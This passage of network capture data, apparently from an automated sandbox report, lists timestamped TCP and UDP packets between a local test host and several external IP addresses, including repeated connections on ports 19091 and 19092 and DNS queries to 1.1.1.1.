                                                                                                                                                                                                            Dec 29, 2024 09:02:12.396800041 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.396838903 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.399485111 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.399502039 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.399538994 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.402213097 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.402292013 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.402335882 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.404944897 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.405102015 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.405138016 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.407705069 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.407798052 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.407845974 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.410444021 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.410531044 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.410618067 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.413218975 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.413285971 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.413429022 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.415925026 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.416083097 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.416126966 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.418644905 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.418765068 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.418801069 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.421418905 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.421600103 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.421669006 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.424227953 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.424319983 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.424361944 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.426883936 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.426992893 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.427028894 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.429603100 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.429728985 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.429797888 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.432387114 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.432431936 CET1909149738118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.432481050 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.739072084 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.739135981 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.744915962 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:12.864434004 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.293493032 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.293662071 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.296830893 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.416635036 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.467242002 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.586750984 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.586935043 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.697072983 CET8049740180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.697175980 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.846714020 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.846872091 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.848267078 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:13.967760086 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.007144928 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.126955986 CET8049740180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.397253036 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.397352934 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.536041021 CET8049740180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:14.536104918 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.284045935 CET4974780192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.284368038 CET4974880192.168.2.439.156.85.200
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.284661055 CET4974980192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.403749943 CET804974739.156.85.231192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.403856039 CET4974780192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.403918028 CET804974839.156.85.200192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.404105902 CET804974939.156.85.201192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.404184103 CET4974880192.168.2.439.156.85.200
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.404266119 CET4974980192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.406244993 CET4974780192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.455367088 CET4973819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:15.525744915 CET804974739.156.85.231192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:16.113683939 CET4975180192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:16.118736029 CET4975280192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:16.233356953 CET804975139.156.85.201192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:16.233422995 CET4975180192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:16.238246918 CET804975239.156.85.201192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:16.238308907 CET4975280192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.001564026 CET804974739.156.85.231192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.001821995 CET804974739.156.85.231192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.002003908 CET804974739.156.85.231192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.002021074 CET4974780192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.002183914 CET4974780192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.002258062 CET4974780192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.002707005 CET4975580192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.122227907 CET804975539.156.85.231192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.122400999 CET4975580192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.232032061 CET4974880192.168.2.439.156.85.200
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.232230902 CET4974980192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.232345104 CET4975180192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.232448101 CET4975280192.168.2.439.156.85.201
                                                                                                                                                                                                            Dec 29, 2024 09:02:17.232543945 CET4975580192.168.2.439.156.85.231
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.026551962 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.027101994 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.146133900 CET8049740180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.146570921 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.553643942 CET8049740180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.553718090 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.554636002 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.577312946 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.577368975 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:18.674110889 CET8049740180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:19.081820965 CET8049740180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:19.081899881 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:19.788495064 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:19.908122063 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:19.908162117 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:19.908171892 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:19.908181906 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:20.335791111 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:20.336114883 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:20.455626011 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:28.577920914 CET8049739180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:28.577991962 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:29.080614090 CET8049740180.163.251.230192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:29.080708981 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:02:30.200666904 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:30.320379972 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:30.741657972 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:30.794229984 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:30.826570988 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:30.946125031 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:46.936474085 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:47.056154966 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:47.477442980 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:47.528603077 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:47.547113895 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:47.666672945 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:03.638056040 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:03.757777929 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:04.179034948 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:04.231786966 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:04.566518068 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:04.686144114 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.528655052 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:19.648077011 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.069307089 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.169233084 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.170553923 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:20.290999889 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:36.747454882 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:36.867029905 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:37.288850069 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:37.356789112 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:37.462064028 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:37.581593990 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:45.294847012 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:03:45.294847012 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:03:45.598126888 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:03:45.654021025 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:03:46.278604031 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:03:46.356753111 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:03:47.481733084 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:03:47.669245005 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:03:49.981740952 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:03:50.169231892 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:03:53.779469013 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:53.779572010 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:53.914891005 CET1909149744118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:53.914949894 CET4974419091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:54.872358084 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:03:55.169294119 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:03:55.747855902 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:03:55.868042946 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:03:55.868124008 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:04:03.217797041 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:04:03.337618113 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:03.337696075 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:03.337778091 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:03.337806940 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:03.768891096 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:03.769138098 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:04:03.888793945 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:04.481733084 CET4973980192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:04:04.966130972 CET4974080192.168.2.4180.163.251.230
                                                                                                                                                                                                            Dec 29, 2024 09:04:13.622551918 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:04:13.742100954 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:14.613984108 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:14.614346981 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:14.614428997 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:04:14.722553968 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:04:14.842120886 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:30.575700045 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:04:30.695441008 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:31.147589922 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:31.212337971 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:04:31.232924938 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:04:31.352422953 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:48.055336952 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:04:48.174930096 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:48.601156950 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:04:48.684889078 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:04:48.719703913 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:04:48.839298964 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:05.327124119 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:05.327279091 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:05.446768999 CET1909249891118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:05.446819067 CET4989119092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:07.263696909 CET5002619091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:07.383354902 CET1909150026118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:07.383430004 CET5002619091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:14.999675989 CET5002619091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:15.356781960 CET5002619091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:15.429574013 CET1909150026118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:15.429586887 CET1909150026118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:15.429595947 CET1909150026118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:15.429609060 CET1909150026118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:15.477123976 CET1909150026118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:15.844955921 CET1909150026118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:15.845333099 CET5002619091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:15.964997053 CET1909150026118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:25.247493982 CET5002619091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:25.367043972 CET1909150026118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:25.775510073 CET1909150026118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:25.856756926 CET5002619091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:25.859185934 CET5002619091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:25.978758097 CET1909150026118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:42.606786013 CET5002619091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:42.606868982 CET5002619091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:42.727983952 CET1909150026118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:42.728060961 CET5002619091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:44.547662973 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:44.667208910 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:44.667743921 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:51.619580030 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:51.739486933 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:51.739501953 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:51.739509106 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:51.739512920 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:52.385091066 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:05:52.387902021 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:05:52.507512093 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:06:01.044307947 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:06:01.044397116 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:06:01.163994074 CET1909250027118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:06:01.164851904 CET5002719092192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:06:03.732121944 CET5002819091192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:06:03.851650000 CET1909150028118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:06:03.851876020 CET5002819091192.168.2.4118.107.44.219

                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Dec 29, 2024 09:01:57.980811119 CET5368853192.168.2.41.1.1.1
                                                                                                                                                                                                            Dec 29, 2024 09:01:58.441051960 CET53536881.1.1.1192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.367391109 CET5959553192.168.2.41.1.1.1
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.554183006 CET5579853192.168.2.41.1.1.1
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.720099926 CET5859053192.168.2.41.1.1.1
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.720355034 CET5787853192.168.2.41.1.1.1
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.783198118 CET53595951.1.1.1192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.965209961 CET53557981.1.1.1192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.967281103 CET233633478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.968031883 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:09.968128920 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.045281887 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.045281887 CET233633478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.045373917 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.108865976 CET53578781.1.1.1192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.109944105 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.134640932 CET53585901.1.1.1192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.263241053 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.263241053 CET233633478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.263336897 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.482146025 CET233633478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.482248068 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.482476950 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.701884031 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.701884985 CET233633478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:10.702392101 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.002345085 CET233633478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.002377987 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.002404928 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.233421087 CET233633478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.233421087 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.233467102 CET233643478192.168.2.41.192.136.170
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.341883898 CET3478233631.192.136.170192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.341953039 CET3478233631.192.136.170192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.341981888 CET3478233631.192.136.170192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.342009068 CET3478233631.192.136.170192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:11.342036009 CET3478233631.192.136.170192.168.2.4
